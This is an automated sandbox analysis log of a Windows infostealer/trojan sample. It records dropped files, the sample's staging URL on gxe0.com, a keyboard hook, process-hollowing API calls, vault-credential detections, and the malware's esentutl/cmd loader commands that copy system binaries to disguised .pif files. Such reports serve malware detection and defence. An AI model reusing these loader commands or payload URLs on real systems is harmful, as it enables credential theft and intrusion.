Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000626000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DCD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DE3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfsse
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssl
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_0640C970 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0640D7F0,00000000,00000000 24_2_0640C970
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: server_BTC.exe.8.dr, opqcmgIPmeabY.cs Long String: Length: 17605
Source: TrojanAIbot.exe.10.dr, opqcmgIPmeabY.cs Long String: Length: 17605
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78670 NtUnmapViewOfSection, 0_2_02E78670
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78400 NtReadVirtualMemory, 0_2_02E78400
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E77A2C NtAllocateVirtualMemory, 0_2_02E77A2C
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02E7DC8C
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02E7DC04
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02E78D70
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02E7DD70
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E77D78 NtWriteVirtualMemory, 0_2_02E77D78
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E77A2A NtAllocateVirtualMemory, 0_2_02E77A2A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02E7DBB0
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02E78D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB8670 NtUnmapViewOfSection, 22_2_02DB8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB8400 NtReadVirtualMemory, 22_2_02DB8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB7A2C NtAllocateVirtualMemory, 22_2_02DB7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB7D78 NtWriteVirtualMemory, 22_2_02DB7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread, 22_2_02DB8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DBDD70 NtOpenFile,NtReadFile,NtClose, 22_2_02DBDD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB86F7 NtUnmapViewOfSection, 22_2_02DB86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB7AC9 NtAllocateVirtualMemory, 22_2_02DB7AC9
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB7A2A NtAllocateVirtualMemory, 22_2_02DB7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DB8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread, 22_2_02DB8D6E
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 0_2_02E7F7C8
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E620C4 0_2_02E620C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009E41C8 9_2_009E41C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009E4A98 9_2_009E4A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009EEA80 9_2_009EEA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009EAA43 9_2_009EAA43
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009E3E80 9_2_009E3E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009EDF00 9_2_009EDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_062756B8 9_2_062756B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_062766E8 9_2_062766E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_0627C2A0 9_2_0627C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_0627B32A 9_2_0627B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06273178 9_2_06273178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06277E78 9_2_06277E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06277798 9_2_06277798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_0627E4C0 9_2_0627E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06272350 9_2_06272350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06270040 9_2_06270040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06275DDF 9_2_06275DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_06270025 9_2_06270025
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 10_2_028B85B7 10_2_028B85B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 10_2_028B85C8 10_2_028B85C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0306B490 11_2_0306B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0306B470 11_2_0306B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_08973E98 11_2_08973E98
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065BDAAC 15_2_065BDAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B1B94 15_2_065B1B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065BE608 15_2_065BE608
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B25B8 15_2_065B25B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B25A8 15_2_065B25A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B4172 15_2_065B4172
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_065B1D20 15_2_065B1D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 15_2_06633360 15_2_06633360
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DA20C4 22_2_02DA20C4
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 22_2_02DAC977 22_2_02DAC977
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C941C8 24_2_00C941C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C9A988 24_2_00C9A988
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C9EA80 24_2_00C9EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C94A98 24_2_00C94A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C93E80 24_2_00C93E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_00C9DE38 24_2_00C9DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_064047CC 24_2_064047CC
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06401B48 24_2_06401B48
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_064067F1 24_2_064067F1
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06401F00 24_2_06401F00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06405A41 24_2_06405A41
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06405AC0 24_2_06405AC0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06405B08 24_2_06405B08
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06417E78 24_2_06417E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_064166E8 24_2_064166E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_064156B8 24_2_064156B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_0641C2A0 24_2_0641C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06412360 24_2_06412360
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_0641B338 24_2_0641B338
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06417798 24_2_06417798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_0641E4C0 24_2_0641E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06415DF0 24_2_06415DF0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06410040 24_2_06410040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 24_2_06410025 24_2_06410025
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\Wisrysxl.PIF 054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02DA46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02DA4860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02DB894C appears 50 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E64500 appears 33 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E64860 appears 949 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E789D0 appears 45 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E7894C appears 56 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E644DC appears 74 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: String function: 02E646D4 appears 244 times
Source: 2jbMIxCFsK.exe Binary or memory string: OriginalFilename vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D99000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2143795019.0000000022293000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2143795019.0000000022264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002275000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: armsvc.exe.8.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winEXE@49/26@4/3
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E67FD4 GetDiskFreeSpaceA, 0_2_02E67FD4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E76DC8 CoCreateInstance, 0_2_02E76DC8
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7270c52c6967b89b-inf
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7270c52c6967b89b73779169-b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 2jbMIxCFsK.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe File read: C:\Users\user\Desktop\2jbMIxCFsK.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\2jbMIxCFsK.exe "C:\Users\user\Desktop\2jbMIxCFsK.exe"
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
